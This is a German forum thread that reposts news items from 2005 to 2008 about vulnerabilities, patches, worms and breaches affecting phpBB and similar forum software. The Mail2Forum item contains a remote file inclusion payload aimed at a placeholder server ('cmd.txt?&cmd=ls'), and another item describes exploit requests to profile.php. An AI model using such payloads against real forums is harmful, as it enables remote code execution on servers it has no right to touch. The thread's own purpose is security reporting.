DVB-Cube BETA <<< Das deutsche PC und DVB-Forum >>>

PC-Ecke => # Security Center => Thema gestartet von: SiLæncer am 28 Februar, 2005, 13:35

Titel: Erneut kritische Lücke in phpBB
Beitrag von: SiLæncer am 28 Februar, 2005, 13:35

Betreiber der populären Forensoftware phpBB kommen nicht zur Ruhe. Kaum ist die kürzlich veröffentlichte Version 2.0.12 installiert -- in der zwei Sicherheitslöcher geschlossen sind -- steht 2.0.13 ins Haus. Auch dort hat man zwei Lücken beseitigt. Über eine davon können Angreifer an Administratorrechte gelangen und so etwa die Kontrolle über die Foren übernehmen. Die Entwickler empfehlen dringend das Update auf die fehlerbereinigte Version.

Wer nicht gewillt ist, eine komplett neue Version zu installieren, kann den kritischen Fehler im Modul includes/sessions.php auch selbst beseitigen. Die Zeile :

if( $sessiondata['autologinid'] == $auto_login_key )

ist durch

if( $sessiondata['autologinid'] === $auto_login_key )

zu ersetzen.

Die zweite, weniger kritische Schwachstelle erfordert etwas mehr Änderungen. Nähere Angaben sind deshalb dem Original-Advisory zu entnehmen.

Quelle und Links : http://www.heise.de/newsticker/meldung/56866

Titel: phpBB 2.0.15 behebt mehrere Schwachstellen
Beitrag von: SiLæncer am 09 Mai, 2005, 11:04

Anwender der populären Foren-Software "phpBB" sollten auf die neueste Version 2.0.15 wechseln, in der nach Angaben der Entwickler neben kleineren Schwachstellen auch eine kritische Sicherheitslücke behoben ist. Worauf das Problem genau beruht und ob ein Angreifer damit den Server kompromittieren kann, ist im Advisory nicht beschrieben. Der Patch zum Stopfen besteht aber nur aus zwei zusätzlichen Zeilen, die ein Zeichen in einer Zeichenkette ersetzen. Die Entwickler empfehlen dringend, den "summer needs to be hot" getauften Release zu installieren, da dort nun auch die bislang nur in "phpBB Olympus" implementierte Admin-Re-authentication-Funktion Eingang gefunden hat.

Quelle und Links : http://www.heise.de/newsticker/meldung/59378

Titel: Neue Version von phpBB schließt kritische Sicherheitslücke
Beitrag von: SiLæncer am 28 Juni, 2005, 09:00

Die Entwickler der populären Forensoftware phpBB haben das Update 2.0.16 zur Verfügung gestellt, in der nach eigenen Angaben eine kritische Sicherheitslücke geschlossen ist. Worum es sich genau handelt und wie Angreifer sie ausnutzen können, ist in der Ankündigung nicht beschrieben. Offenbar steckt das Problem wieder einmal im Highlighting-Code von phpBB. Über eine ältere Schwachstelle in diesem Code befiel Ende 2004 der Wurm Santy zahlreiche Foren.

Die Entwickler empfehlen dringend, das Update zu installieren. Neben der Sicherheitslücke sind auch einige weitere, aber nicht sicherheitsrelevante Fehler beseitigt. Wer nicht die komplette neue Version installieren kann oder möchte, kann die Lücke auch einfach durch Änderung einer Zeile in der Software beheben. Ein genaue Anleitung dazu ist in der Ankündigung zu finden.

Quelle und Links : http://www.heise.de/newsticker/meldung/61123

Titel: Erneute Angriffe auf PHP-Software
Beitrag von: SiLæncer am 03 Juli, 2005, 14:36

Nachdem für die kürzlich gefundenen Schwachstellen in phpBB ein Exploit veröffentlicht wurde, meldet das Internet Storm Center gezielte Angriffe auf Foren, die diese Software einsetzen. Versionen vor phpBB 2.0.16 erlauben es, Befehle einzuschleusen, die der Server mit den Rechten des Web-Servers ausführt.

Der Fehler steckt erneut in dem Skript viewtopic.php script, das den Parameter highlight nicht ausreichend überprüft. Ein ähnliches Problem nutzte bereits der Santy-Wurm, um Ende 2004 automatisiert Foren-Server zu befallen. Administratoren sollten schleunigst auf die neue Version 2.0.16 umstellen oder zumindest die bereitgestellten Patches einspielen.

Auch für die kürzlich entdeckte Schwachstelle in den XML-RPC-Bibliotheken sind Exploits in Umlauf. Gefährdet sind unter anderem PHP-Programme wie PostNuke, TikiWiki und Drupal.

Quelle und Links : http://www.heise.de/newsticker/meldung/61352

Titel: Hoster raten von phpBB ab
Beitrag von: SiLæncer am 11 Juli, 2005, 10:05

Wiederholte Sicherheitsprobleme machen der Board-Software zu schaffen

Einige Web-Hoster verbannen die populäre, freie Board-Software phpBB wegen wiederholter Sicherheitsprobleme, berichtet Netcraft. Sicherheitslöcher in der weit verbreiteten Software hatten wiederholt Angriffe nach sich gezogen. Im Dezember hatte der Wurm Santy diverse Webseiten verunstaltet.

Die Entwickler von phpBB weisen entsprechende Vorwürfe zurück, hier werden FUD (Fear, Uncertainty and Doubt) gestreut, heißt es in einer Stellungnahme auf phpBB.com. Man habe sich entsprechender Probleme immer schnell angenommen und diese beseitigt. Zudem seien oft Sicherheitslücken in anderen Applikationen wie AWStats schuld, wenn es zu Einbrüchen in Server komme.

Beim Hoster HostPC sieht man dies anders und warnt die eigenen Kunden vor dem Einsatz der Software.

Quelle und Línks : http://www.golem.de/0507/39143.html

Titel: Forensoftware punBB schließt Sicherheitslücken
Beitrag von: SiLæncer am 11 Juli, 2005, 21:59

Das Forensystem punBB schließt mit der Veröffentlichung der Version 1.2.6 zwei kritische Sicherheitslücken, die der Sicherheitsspezialist Stefan Esser entdeckt hat. Die freie, unter der GPL stehende Software versteht sich als schnelle, leichtgewichtige Alternative zum grafiklastigen, überladenen phpBB.

Die erste Sicherheitslücke betrifft das Modul zum Editieren der Benutzer-Profile. Eine uninitialisierte Variable ermöglicht das Einschleusen von beliebigen SQL-Befehlen. Ein Forum-Nutzer kann sich auf diesem Wege in die Administratorgruppe eintragen. Administratoren sind dazu berechtigt, weiteren PHP-Code in die Templates einzufügen.

Eben dieses Template-System von punBB ist von einer weiteren Schwachstelle betroffen. In der Funkton <pun_include "filename"> werden die Argumente erst überprüft, nachdem die Seite zusammengestellt wurde. Dies ermöglicht über mögliche Cross-Site-Scripting-Lücken das Einschleusen beliebigen PHP-Codes.

Die Lücken wurden mit der inzwischen verfügbaren Version 1.2.6 geschlossen, die umgehend von punBB-Administratoren eingespielt werden sollte.

Quelle und Links : http://www.heise.de/security/news/meldung/61575

Titel: Keksklau mit phpBB
Beitrag von: SiLæncer am 18 Juli, 2005, 15:27

Die Diskussionsforen-Software phpBB ist für eine weitere Cross-Site-Scripting-Attacke anfällig. Betroffen sind die Versionen bis einschließlich der aktuellen 2.0.16. Es ist bereits ein Exploit aufgetaucht, der dieses Leck nutzt. Der veröffentlichte Exploit schickt die Cookies eines Forum-Nutzers an einen beliebigen Server, sofern dieser mit dem Internet Explorer einen Beitrag aufruft, der den schadhaften Code enthält. Es ist gut möglich, dass auch schon Code existiert, der im Zusammenspiel mit anderen Webbrowsern funktioniert. Mit diesem Schadcode lassen sich gegebenenfalls die Zugangsdaten von Forumsteilnehmern ergaunern.

Die phpBB-Entwickler arbeiten derzeit an einem Patch gegen die Lücke. Meik Sievertsen, der unter dem Pseudonym "acyd burn" die Entwicklung der Forensoftware leitet, bestätigte heise Security auf Anfrage die Lücke sowie die Funktionsfähigkeit des Exploits und ergänzt: "phpBB 2.0.17 steht vor der Tür und befindet sich im finalen Teststadium. Der Zeitdruck ist natürlich immens, da der Urheber den Exploit gepostet hat, ohne uns vorher zu informieren."

Einen Workaround für das Problem gibt es derzeit nicht. Bei Verfügbarkeit der neuen Version sollten betroffene Administratoren zum Schutze ihrer eigenen Sicherheit und der ihrer Forenmitglieder umgehend das Update einspielen.

Quelle und Links : http://www.heise.de/newsticker/meldung/61794

Titel: Keksklau mit phpBB [Update]
Beitrag von: SiLæncer am 18 Juli, 2005, 18:03

Update:

Auf der Seite www.phpbb2.de ist ein inoffizieller Patch verfügbar. Betroffene Administratoren sollten den Anweisungen auf der Seite folgen und eine Sicherungskopie der zu ersetzenden Datei anlegen.

Quelle : www.heise.de

Titel: phpBB 2.0.17 stopft erste Löcher
Beitrag von: SiLæncer am 20 Juli, 2005, 12:14

Mit der heute erschienenen Version 2.0.17 der Diskussionsforen-Software phpBB schließen die Entwickler vor allem die vor kurzem bekannt gewordene Cross-Site-Scripting-Lücke. In den Release-Notes erklären die Entwickler, dass phpBB derzeit einem ausführlichen Security Audit unterzogen wird, um die Sicherheit der Software zu verbessern. Hierzu habe man ein Team zusammengestellt, dem unter anderem Programmierer von populären Erweiterungen für phpBB angehören, die tiefergehendes Verständnis der Codebasis besitzen.

Auf der Download-Seite des Projektes stehen die aktualisierten Pakete zur Verfügung. Administratoren, die phpBB einsetzen, wird zu einem zügigen Update geraten. Neben der Cross-Site-Scripting-Lücke hat das Entwicklerteam weitere Fehler in der Forensoftware mit der neuen Version 2.0.17 ausgebügelt.

Da die Security Audits noch andauern, ist in nächster Zeit mit kürzeren Update-Zyklen zu rechnen. Dem Forum auf der phpBB-Website ist zu entnehmen, dass sich möglicherweise noch weitere Fehler in der Software befinden. Gegebenenfalls sollte laut den dortigen Postings das BBCODE-System deaktiviert werden, bis die Fehler -- vor allem in der Highlighting-Funkton -- endgültig beseitigt wurden.

Quelle und Links : http://www.heise.de/newsticker/meldung/61871

Titel: Zahlreiche Fehler in Forensoftware phpBB beseitigt
Beitrag von: SiLæncer am 31 Oktober, 2005, 11:54

Die Entwickler der beliebten Forensoftware phpBB haben die neue Version 2.0.18 (The Halloween Special Release) zum Download bereit gestellt. Neben zahlreichen Bugs hat man auch diverse Sicherheitslücken gestopft, die die Programmierer bei einem Code-Audit entdeckt haben. Zudem sind auch Schwachstellen beseitigt, die externe Sicherheitsspezialisten entdeckt hatten. Unter anderem soll es damit möglich sein, eigene Befehle an die Datenbank zu übergeben, beliebigen PHP-Code auszuführen und HTML-Code für Cross-Site-Scripting-Attacken einzuschleusen.

In ihrer Ankündigung zur neuen Version weisen die Entwickler explizit darauf hin, dass für ein Update die Installation neuer Dateien nicht ausreiche. Zusätzlich ist noch die Aktualisierung der Datenbank erforderlich. Dies soll das im Installationspaket enthaltende Datenbank-Update-Skript erledigen.

Siehe dazu auch:

    * phpBB 2.0.18 released von phpBB.org
    * phpBB Multiple Vulnerabilities Advisory von Hardened-PHP Project


Quelle und Links : http://www.heise.de/security/news/meldung/65568

Titel: PHP-Foren als Angriffsziel
Beitrag von: SiLæncer am 25 Dezember, 2005, 12:54

Pünktlich zur Weihnachtszeit wurde ein Exploit zu Schwachstellen in der Foren-Software phpBB veröffentlicht. Mit ihm lassen sich auf Systemen, auf denen phpBB in einer Version bis einschließlich 2.0.17 läuft, beliebige Befehle ausführen. Bereits vergangenes Jahr um diese Zeit nutzte der Wurm Santy ähnliche Schwachstellen, um massenweise Web-Server zu entstellen. Ob die in den letzten Tagen bei heise Security vermehrt eingegangenen Berichte über Befälle mit einem Lupper-Wurm bereits mit diesem Exploit in Zusammenhang stehen, ist bisher nicht klar.

Der Exploit sendet POST-Anfragen für profile.php?GLOBALS[...], die sich in den Log-Dateien des Web-Servers finden lassen sollten. Über sie versucht er einen neuen User r57phpBB2017xplXXXX anzulegen und dabei den auszuführenden Code einzuschleusen. Der Exploit funktioniert nur mit PHP bis einschließlich Version 5.0.5 wenn register_globals aktiv ist.

Die Lücken in phpBB wurden Ende Oktober durch das "Halloween Special Release", also Version 2.0.18 beseitigt. Betreiber von PHP-Foren insbesondere mit phpBB sollten unbedingt überprüfen, ob bereits die aktuelle Version in Betrieb ist und wenn nicht, das Forum sofort stilllegen bis die aktuelle Version installiert wurde.

Siehe dazu auch:

    * Zahlreiche Fehler in Forensoftware phpBB beseitigt auf heise Security
    * Remote Command Execution Exploit auf FrSIRT

Quelle und Links : http://www.heise.de/security/news/meldung/67768

Titel: Würmer im Wandel
Beitrag von: SiLæncer am 27 Dezember, 2005, 09:54

Mit dem Ausklingen des Jahres 2005 melden sich auch die großen Antivirus- und E-Mail-Spezialisten mit ihren Jahresrückblicken zu Wort. Insbesondere in einem Punkt sind sich Sophos, F-Secure und MessageLabs in ihren Veröffentlichungen einig: In diesem Jahr war ein deutlicher Trend weg von aggressiven und großflächigen Virenausbrüchen zu beobachten, die Millionen von Internet-Nutzern treffen. Doch an eine Entspannung der Lage ist nicht zu denken, denn an deren Stelle tritt verstärkt eine Vielzahl von Angriffen mit kleinen Zielgruppen durch hoch spezialisierte und trickreiche Malware, die kaum ins Licht der Öffentlichkeit rückt und daher lange unerkannt bleiben kann.

So lassen sich laut F-Secure die großen Virenausbrüche des zweiten Halbjahres 2005 in nur zwei große Wellen einteilen. Die im August gemeldete Plug&Play-Lücke in Windows brachte schlagartig eine erfolgreiche Wurm-Generation hervor, die sich auf diese Schwachstelle zum Eindringen in Systeme spezialisiert hatte, und im November überflutete Sober.Y Millionen von E-Mail-Postfächern. Andererseits verzeichnete beispielsweise Sophos für 2005 mit rund 16.000 neuen Schädlingen, von denen nahezu zwei Drittel Windows-Trojaner waren, einen um 50 Prozent größeren Zuwachs als im Vorjahreszeitraum.

Obwohl die Zahl der großflächigen Wurm- und Virenausbrüche insgesamt zurückgeht, steigt weiterhin die Zahl der Bot-Netze, bei denen infizierte PCs als Spam-Zombies oder für DoS-Angriffe missbraucht werden. Hier bestimmt weitestgehend Geld die Szene: Bot-Netze werden vermehrt vermietet und verkauft; nicht selten erpressen Kriminelle Website-Betreiber mit der Androhung von DoS-Angriffen. Eine der größten bislang registrierten Zombie-Armeen bestand aus rund 100.000 infizierten Computern.

Bei modernen Schädlingen steht eine möglichst gute Tarnung immer weiter oben auf der Prioritätenliste. So registrierte MessageLabs eine ganze Reihe von speziellen Trojanern, die es auf Zugangsdaten fürs Online-Banking abgesehen haben und dazu zunächst inaktiv blieben. "Sobald der Anwender jedoch eine bestimmte Ziel-Website aufruft, übernehmen Phishing-Trojaner unmittelbar nach der Authentifizierung die Kontrolle über die Session, um systematisch Konten zu plündern" warnt der Filterspezialist. Es ist damit zu rechnen, dass gerade diese professionellen Betrüger dabei nächstes Jahr verstärkt Rootkit-Funktionen einsetzen werden, um ihrem Treiben unerkannt im Hintergrund nachgehen zu können. Wie Sony BMG mit seinem Kopierschutz-Rootkit eindrucksvoll demonstrierte, kann man durch gezielte Manipulationen des Betriebssystems sehr effizient Prozesse und Programme vor Anwendern und auch Antiviren-Programmen verstecken.

Ebenfalls Besorgnis erregend ist die enorme Zunahme von Phishing-Angriffen zum Diebstahl personenbezogener Daten insbesondere für Online-Banking und Bezahldienste. Nach den Erkenntnissen von MessageLabs handelte es sich 2005 bei jeder dreihundertsten E-Mail um eine Phishing-Mail.

Grundsätzlich wird mit immer ausgefeilterem Social Engineering versucht, Nachrichtenempfänger zum Besuch bösartiger Websites oder direkt zur Ausführung von Schadsoftware zu bewegen; ein Umstand, der nach Einschätzung von Sophos vor allem mit der insgesamt verbesserten Sicherheit von Windows-Systemen durch automatische Updates und die standardmäßig aktivierte Windows Firewall von XP Service Pack 2 zusammenhängt. Auch Naturkatastrophen und Terroranschläge, wie nach dem Hurrikan Katrina oder den Anschlägen in der Londoner U-Bahn, würden zunehmend gezielt eingesetzt, um Neugier und Mitleid bei den Lesern zu erzeugen, heißt es bei F-Secure.

Mit der zunehmenden Beliebtheit von Instant Messengern und mobilen Endgeräten sind auch deren Nutzer ein immer attraktiveres Ziel für die Schädlings-Autoren. Würmer lernen, interaktiv auf eingehende IM-Nachrichten zu reagieren und laut F-Secure hat sich die Zahl der Viren für mobile Endgeräte mit inzwischen über 100 seit Ende 2004 nahezu verzehnfacht.

Dass Würmer kein reines Windows-Phänomen sind, demonstrierten 2005 eine Reihe von PHP-Würmern, die gezielt Lücken in PHP-Software ausnutzen, um vor allem Linux-Server zu befallen. Den Reigen eröffnete vergangenes Jahr um diese Zeit Santy, gefolgt von weiteren Würmern, die Schwachstellen unter anderem in phpBB ausnutzten. Derzeit erhält heise Security wieder vermehrt Hinweise zu einem Wurm namens Lupper, der seit November sein Unwesen treibt. Ein Ende dieses Trends ist nicht abzusehen und Schwachstellen in Web-Applikationen werden wohl auch im kommenden Jahr Einfallstore für Würmer darstellen.

Siehe dazu auch:

    * Top-20 der Sicherheitslücken
    * Bedrohung durch Keylogger unterschätzt
    * Studie: Anwender können kaum noch zwischen guten und bösen Mails unterscheiden
    * Millionenschaden durch Phishing
    * Studie: Organisierte Internetkriminalität nimmt rapide zu
    * BSI veröffentlicht Bericht zur IT-Sicherheitslage
    * Weniger Viren, mehr Trojaner

Quelle und Links : http://www.heise.de/security/news/meldung/67644

Titel: phpBB 2.0.19 schließt Cross-Site-Scripting-Lücken
Beitrag von: SiLæncer am 02 Januar, 2006, 12:43

Mit Version 2.0.19 der beliebten Foren-Software phpBB schließen die Entwickler unter anderem zwei Cross-Site-Scripting-Lücken, die aber nur im Internet Explorer zum Trage kommen. Weitere Neuerung: Die Anzahl maximaler Login-Versuche kann begrenzt werden.

Eine der Cross-Site-Scripting-Lücken fand sich im bbcode zum Anzeigen von URLs. Die Andere betraf HTML-Tags, wenn diese in der Board-Konfiguration erlaubt und aktiviert wurden. Durch die Begrenzung der Login-Versuche wollen die Entwickler Wörterbuchattacken oder Brute-Force-Angriffe verhindern.

Da inzwischen mehrere Würmer im Netz unterwegs sind, die automatisiert Schwachstellen in älteren phpBB-Versionen auszunutzen versuchen, ist die Installation des jeweils aktuellen Releases dringend zu empfehlen.

Siehe dazu auch:

    * phpBB 2.0.19 released von den phpBB-Entwicklern
    * Download der neuen phpBB-Version

Quelle und Links : http://www.heise.de/security/news/meldung/67878

Titel: Bot registriert sich in mehreren tausend phpBB-Foren
Beitrag von: SiLæncer am 20 März, 2006, 11:40

Nachdem im Forum eines deutschen Webhosters bereits vor 14 Tagen auf einen phpBB-Bot hingewiesen wurde, der sich als Anwender mit dem Namen FuntKlakow registrierte, spekulieren nun weitere Foren und Blogs über seine Funktion und eine mögliche Vorbereitung eines großangelegten Angriffs. Fakt ist: Seit dem 4. März legt ein Bot in tausenden von phpBB-Foren einen Anwender namens FuntKlakow an. In einigen Fällen postet der Bot recht kurze Meldungen in einige Foren, etwa "Wow, that is cool!", "I agree with you completely" und oder "Ditto". Manchmal trägt er Werbung in seiner Signatur ein, was die Vermutung nahe legt, dass es sich um einen klassischen Spam-Bot handelt.

In vielen Fällen scheint er aber auch inaktiv zu bleiben, was einige phpBB-Betreiber befürchten lässt, dass FuntKlakow einen Angriff auf eine bislang unbekannte Schwachstelle vorbereitet, für die ein aktiver Account notwendig ist. Selbst wenn dafür kein aktives Konto erforderlich ist, wäre der Bot so bereits im Besitz einer großen Liste von phpBB-Servern. Er müsste also nicht umständlich über Google nach verwundbaren Foren suchen, wie beispielsweise der um Weihnachen 2004 ausgebrochene phpBB-Wurm Santy. Seinerzeit blockte Google schnell die spezifischen Suchanfragen des Wurms ab, sodass er sich nicht mehr weiterverbreiten konnte.

Ob nur Spam-Versuch oder Angriffsvorbereitung: Nervig sind solche automatisierten Anmeldungen auf jeden Fall. Hat FuntKlakow das eigene Board noch nicht besucht, so sollte man in der Nutzerverwaltung von phpBB den Namen unter "Disallow Names" eintragen. Dabei lohnt es sich gleich auch noch andere bekannte Spam-Konten wie jtfoe1974, unmmyns, coldsorin, fairlande, largepafilis, pirsrv, sadlatour, bighor-lam, greatfintan, budowa_cepa und Cepelin zu sperren. Bei kleineren Boards hilft auch die Aktivierung der E-Mail-Validierung, also das Senden eines Bestätigungslinks an das bei der Anmeldung angegebene Mail-Postfach. Zumindest FuntKlakow soll darauf nicht reagieren, sodass das Konto inaktiv bleibt.

Um schon den Anmeldeversuch des Bots in Leere laufen zu lassen, dient die in phpBB integrierte visuelle Bestätigung einer zufälligen, per Grafik dargestellen Zeichenkette, auch Captcha genannt. Leider ist auch hier das Wettrüsten bereits in vollem Gange. Für einige Ausführungen von Captchas, auch der von phpBB, gibt es bereits Erkennungsroutinen.

Siehe dazu auch:

    * phpBB mass-hack being prepared, Posting auf issociate.de
    * PWNtcha - captcha decoder , Erkennungsroutine für Captchas

Quelle und Links : http://www.heise.de/security/news/meldung/71030

Titel: phpBB-Module reißen Sicherheitslöcher auf
Beitrag von: SiLæncer am 03 Mai, 2006, 14:39

Für die beliebte Forensoftware phpBB entwickeln Enthusiasten Erweiterungen in Form von Modulen. Diese können jedoch auch für Schwachstellen verantwortlich zeichnen, über die Angreifer beliebige PHP-Dateien auf dem Forenserver ausführen können.

Ein Hacker mit dem Namen [Oo] hat in den zwei Zusatzmodulen TopList sowie Advanced Guestbook Lücken ausfindig gemacht, über die Angreifer durch Setzen des Parameters phpbb_root_path beliebige PHP-Dateien auch von anderen Servern einbinden können. Dazu muss jedoch die Option register_globals aktiviert sein.

[Oo] hat zu den Lücken Exploits programmiert, die die Ausnutzbarkeit der Schwachstellen demonstrieren. Betroffen sind TopList-Versionen bis einschließlich 1.3.8, das Advanced Guestbook erlaubt das Unterschieben von PHP-Skripten bis einschließlich Version 2.4.0.

Umgehungsmaßnahmen oder Updates gibt es bis jetzt nicht. Da jedoch register_globals zum Funktionieren der Exploits aktiviert sein muss, sollte das Deaktivieren dem Problem abhelfen.

Siehe dazu auch:

    * TopList-Demo-Exploit auf milw0rm.com
    * Advanced-Guestbook-Demo-Exploit auf milw0rm.com

Quelle und Links : http://www.heise.de/security/news/meldung/72626

Titel: phpBB-Mods und tinyBB mit Löchern
Beitrag von: SiLæncer am 30 Mai, 2006, 15:07

Kritische Lücken in diverser Forensoftware machen derzeit Webserver unsicher. Im Monat Mai wurden auf Sicherheits-Mailinglisten und in einschlägigen Exploit-Sammlungen Advisories und Exploits zum Bulletin-Board tinyBB sowie den phpBB-Mods Activity Mod Plus, Advanced Guestbook, Blend Portal System, foing, Knowledge Base, Nivisec Hacks List, phpbb-Auction, phpRaid und TopList veröffentlicht. In allen Fällen ist es einem Angreifer mit Hilfe der Exploits übers Netz unter Umständen möglich, beliebigen PHP-Code mit Rechten des Webserver-Prozesses ausführen zu lassen, sofern dieser mit der Option register_globals on läuft. Zusätzlich ist es einem Angreifer in tinyBB möglich, sich unter beliebigen Account-Namen ohne Kenntnis eines gültigen Passwortes anzumelden.

Die Schwachstellen finden sich laut den Advisories und Exploits in den genannten Mods bis einschließlich der jeweils aktuellen Version. Auch tinyBB ist demnach bis einschließlich der aktuellen Version 0.3 verwundbar. Die bislang für Activity Mod Plus, Blend Portal System und TopList verfügbaren Patch-Anleitungen sollten Board-Admins bei Verwendung dieser Module unbedingt befolgen. Die genannten Lücken lassen sich in einem Rutsch schließen, wenn der Server-Admin die PHP-Option register_globals off in der Konfigurationsdatei php.ini setzt. Dieses Vorgehen ist bei Shared-Webhosting in der Regel nicht möglich, da es immer noch PHP-Software gibt, die auf register_globals angewiesen ist. In diesem Fall hilft nur, verwundbare Mods selbst zu flicken oder sie zu deinstallieren.

Siehe dazu auch:

    * tinyBB <= 0.3 Multiple Remote Vulnerabilities, Advisory von Mustafa Can Bjorn
    * Patch-Anleitung für Activity Mod Plus und Blend Portal System auf php-tweaks.com
    * phpBB-Module reißen Sicherheitslöcher auf, Meldung von heise Security

Quelle und Links : http://www.heise.de/security/news/meldung/73656

Titel: Kritische Lücke in Modul der Forensoftware phpBB
Beitrag von: SiLæncer am 18 Juli, 2006, 15:22

Für das optionale Mail2Forum-Modul der beliebten Forensoftware phpBB ist ein Exploit aufgetaucht, mit dem Angreifer das System kompromittieren können. Ursache des Problems ist die fehlerhafte Verarbeitung des Parameters m2f_root_path in Skripten wie m2f_forum.php, m2f_mailinglist.php und anderen, mit der sich beliebiger PHP-Code ausführen lässt. So kann ein Angreifer den Pfad m2f_root_path auf einen eigenen Server umbiegen (m2f_root_path=http://[server]/cmd.txt?&cmd=ls) und so seinen Schadcode auf dem verwundbaren phpBB-Server ausführen. Wie immer in solchen Fällen lässt sich die Lücke nur ausnutzen, wenn die Option register_globals aktiv ist. Betroffen soll die Version Mail2Forum 1.2 sein. Ein offizieller Patch steht nicht zur Vefügung, Anwender sollten register_globals ausschalten oder den Quellcode des Modul selbst editieren.

Ob diese Lücke auch die Ursache für das Defacement von www.phpBB2.de, den Webseiten des nach eigenen Angaben offiziellen deutschen phpBB2-Supports, darstellt, ist unklar. Seit dem heutigen Dienstagmorgen bekommen Besucher auf der Startseite nur die Meldung "THES SIT HACKED" zu sehen. Interessanterweise ist der Text dabei in Fragmente einer HTML-Seite von Blackhat.com eingebettet, den Webseiten des Veranstalters der bekannten Sicherheitskonferenzen und Schulungen.

Quelle : www.heise.de

Titel: Kritische Lücke in Modul der Forensoftware phpBB [Update]
Beitrag von: SiLæncer am 18 Juli, 2006, 19:23

Update
Mittlerweile ist phpBB2.de wieder erreichbar. In einer Meldung bestätigen die Betreiber die Vermutung, dass die Lücke im Mail2Forum-Modul Ursache des Defacements war. Das Modul wurde zwar nicht aktiv eingesetzt, war aber nach zurückliegenden Tests in einem Unterverzeichnis von außen noch erreichbar. Das zweite offizielle deutsche phpBB-Support-Forum phpBB.de war von dem Angriff nicht betroffen.

Quelle : www.heise.de

Titel: Schwachstellen in phpBB geschlossen
Beitrag von: SiLæncer am 25 Dezember, 2006, 17:09

Die phpBB-Entwickler schließen mit der Version 2.0.22 der Forensoftware einige Sicherheitslücken. Zudem gab es noch einige kosmetische Fehlerbereinigungen.

Die Software überprüft jetzt das Upload-Verzeichnis für Avatare genauer. Die Programmierer haben die Filterregeln für Umleitungen (redirection targets) angepasst. Weiterhin haben sie eine Cross-Site-Scripting-Lücke bei der Anzeige von Privatnachrichten geschlossen. Die Forensoftware überprüft jetzt die Gültigkeit der Sitzung in mehreren Formularen.

Die Entwickler empfehlen allen Nutzern, phpBB baldmöglichst zu aktualisieren. Sie weisen außerdem darauf hin, dass der Administrator nach dem Einspielen des Updates auch das Datenbank-Update-Skript ausführen muss, um die Aktualisierung abzuschließen.

Siehe dazu auch:

    * phpBB 2.0.22 released, Ankündigung der neuen phpBB-Version von den Entwicklern
    * Download von phpBB 2.0.22

Quelle und Links : http://www.heise.de/security/news/meldung/82967

Titel: PHP-Forensysteme erben phpBB-Schwachstelle
Beitrag von: SiLæncer am 02 Februar, 2007, 13:43

Diverse auf phpBB basierende Forensysteme haben die so genannte phpbb_root_path-Schwachstelle geerbt. Ein Hacker namens Mehmet Ince hat in den vergangenen Tagen unter dem Pseudonym Xoron über Mailinglisten bekannt gegeben, dass sich die Lücke in Omegaboard, Cerulean Portal System, phpBB Tweaked, Hailboards, EclipseBB und Xero Portal findet. Für einige Forensysteme sind auch Exploits verfügbar, mit denen es Angreifern unter Umständen möglich ist, auf betroffenen Systemen übers Netz beliebigen Schadcode nachzuladen und zur Ausführung zu bringen.

Einige der Original-Meldungen von Xorox lassen sich nicht ohne Weiteres auffinden, dennoch verweisen Sicherheitsdienstleister wie FrSIRT oder SecurityFocus auf ensprechende Schwachstellen, die er entdeckt haben soll. Die Programmierfehler sollen sich stets in den jeweils aktuellen Versionen der Forensysteme befinden. Über die Verfügbarkeit von Patches ist noch nichts bekannt.

Wer einmal eine Suchmaschine mit einer Anfrage nach "hacked by xoron" bemüht, wird feststellen, dass der Hacker keinesfalls zimperlich mit seinen Exploits umgeht. Unter anderem ist ein Genetik-Forum der TU-Dresden Opfer seiner Defacements geworden. Auch einige der Herstellerseiten der betroffenen Foren, beispielsweise von Cerulean, sind derzeit nicht erreichbar. Ob Letzteres auf die nun verfügbaren Exploits zurückzuführen ist, ist allerdings unklar.

Die phpbb_root_path-Lücke auszunutzen, ist trivial. Selbst wenn kein Exploit verfügbar ist, lassen sich alte Exploits für andere Systeme leicht anpassen oder sogar unverändert anwenden. Betreiber phpBB-basierter Forensysteme sollten ihre Server grundsätzlich absichern. Die wichtigste Methode, einen Exploit der phpbb_root_path-Lücke zu vereiteln, ist die Option register_globals = off in der PHP-Konfigurationsdatei php.ini.

Siehe dazu auch:

    * Omegaboard v1.0b4 (phpbb_root_path) Remote File Include Exploit, Advisory von Xoron auf Bugtraq
    * Cerulean Portal System (phpbb_root_path) Remote File Include Exploit, Advisory von Xoron auf Bugtraq
    * Phpbb Tweaked PHPBB_Root_Path Remote File Include Vulnerability, Eintrag in der Fehlerdatenbank von SecurityFocus
    * HailBoards UserCP_ViewProfile.PHP Remote File Include Vulnerability, Eintrag in der Fehlerdatenbank von SecurityFocus
    * EclipseBB Phpbb_Root_Path Remote File Include Vulnerability, Eintrag in der Fehlerdatenbank von SecurityFocus
    * Xero Portal v1.2 (phpbb_root_path) Remote File Include Vulnerablity, Advisory von Xoron auf Bugtraq

Quelle und Links : http://www.heise.de/security/news/meldung/84709

Titel: Deutsches Support-Forum von phpBB gehackt
Beitrag von: SiLæncer am 05 Februar, 2008, 11:13

Bei einem Angriff auf das deutsche Support-Forum für die beliebte Open-Source-Foren-Software phpBB ist es bislang Unbekannten offenbar gelungen, Benutzerdaten wie Username, E-Mail und den MD5-Hash des Passwortes auszuspähen. Einer Mitteilung der Forenbetreiber zufolge war keine Sicherheitslücke in phpBB Ursache des Einbruchs, sondern das Zusammenspiel verschiedener Faktoren – welche genau, bleibt indes offen. Möglicherweise wurde gezielt das Konto eines Administrators geknackt. Ein Strafantrag wurde bereits gestellt, daher sollen zunächst keine weiteren Informationen veröffentlicht werden.

Mit Hilfe von Brute-Force-Angriffen oder vorberechneten Rainbow-Tables ist es möglich, vom MD5-Hash auf das Klartext-Passwort zu schließen. Da Nutzer des Forums das gleiche Passwort unter Umständen auf verschiedenen Seiten benutzen, empfehlen die Betreiber von phpBB.de, diese dort so schnell wie möglich zu ändern.

Siehe dazu auch:

    * Benutzerdaten auf phpBB.de ausspioniert, Mitteilung vom phpBB.de-Team

Quelle : http://www.heise.de/newsticker/meldung/102993

Titel: Deutsches Support-Forum von phpBB gehackt [Update]
Beitrag von: SiLæncer am 05 Februar, 2008, 11:44

[Update]
Der Angriff auf phpBB.de war offenbar kein Einzelfall, auch das Support-Forum von Woltlab ist wohl gehackt worden. Der Täter bietet die Daten auch bereits zum Verkauf, wie ein Screenshots eines Threads auf h4ckyou.org zeigt. Insgesamt bietet er mehr als 125.000 Datensätze an.

Quelle : www.heise.de

Titel: Weitere Einbrüche in deutsche Support-Foren
Beitrag von: SiLæncer am 06 Februar, 2008, 11:21

